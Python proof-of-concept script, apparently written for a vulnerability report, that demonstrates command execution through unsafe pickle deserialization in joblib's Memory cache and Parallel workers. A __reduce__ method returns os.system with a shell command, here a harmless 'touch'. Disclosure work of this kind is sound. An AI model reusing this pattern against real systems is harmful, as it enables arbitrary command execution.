import joblib from joblib import Parallel, delayed import os import shutil import time # 1. Setup a dynamic cache directory using the current timestamp # This ensures the exploit runs successfully every time the reviewer executes it timestamp = int(time.time()) cache_dir = f"./cache_{timestamp}" class JoblibExploit: def __init__(self, vector_name): self.vector_name = vector_name def __reduce__(self): # The core vulnerability: Unsafe Deserialization # This command creates a unique success file for each vector success_file = f"{self.vector_name}_SUCCESS" return (os.system, (f'touch {success_file}',)) def run_memory_test(): print(f"[*] Testing Vector 1: joblib.Memory (Cache dir: {cache_dir})") mem = joblib.Memory(cache_dir) @mem.cache def cached_function(data): return data # Triggering the exploit via the caching mechanism cached_function(JoblibExploit("MEMORY")) def run_parallel_test(): print("[*] Testing Vector 2: joblib.Parallel (Task Distribution)") def worker(data): return data # Triggering the exploit via parallel worker distribution try: Parallel(n_jobs=2)(delayed(worker)(JoblibExploit("PARALLEL")) for _ in range(1)) except: pass def verify_results(): mem_ok = os.path.exists("MEMORY_SUCCESS") par_ok = os.path.exists("PARALLEL_SUCCESS") print("\n" + "="*30) print(f"[+] Memory ACE Status: {'VULNERABLE' if mem_ok else 'FAILED'}") print(f"[+] Parallel ACE Status: {'VULNERABLE' if par_ok else 'FAILED'}") print("="*30) if mem_ok and par_ok: print("\n[CRITICAL] Exploitation Successful: Arbitrary Code Execution confirmed.") # Optional: Cleanup the newly created cache directory if os.path.exists(cache_dir): shutil.rmtree(cache_dir) if __name__ == "__main__": print("--- Starting Joblib Full ACE Proof of Concept ---") run_memory_test() run_parallel_test() verify_results()